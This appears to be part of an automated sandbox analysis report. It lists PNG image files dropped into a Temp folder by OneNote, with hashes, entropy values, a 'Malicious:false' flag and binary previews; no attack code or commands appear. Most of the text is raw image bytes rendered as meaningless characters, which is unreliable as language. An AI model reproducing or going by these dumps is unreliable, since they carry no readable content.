                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A8C0D073-1204-4E0D-97F0-6BBC44EF7282}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A8CEB3B3-53F2-4A14-B3E3-951914E6E7F5}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A96AAEEA-BC15-4631-BCBA-81C3F4584AEB}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{ABAD0A8C-4F04-4D89-A9AF-AAA1C7D3E388}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{AEE092A0-BFB4-49AF-89D0-F2154DBA479A}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{AFEC24F9-6178-4E4C-8D3E-6CE97C7EABC5}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B04438C1-CEB7-4197-91A1-D10164D89C6D}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B0E724BB-75A7-4227-89CF-8B794D4AEF20}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B8A26195-F9C1-4652-9F0E-B091C6A4DF0B}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B8D86819-BFCA-4C5B-B365-53BCFE86C42A}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B9563878-82F5-44C1-9813-AB1F782914D1}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{BA54430A-DB9B-4BA0-8B71-6235892D496C}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
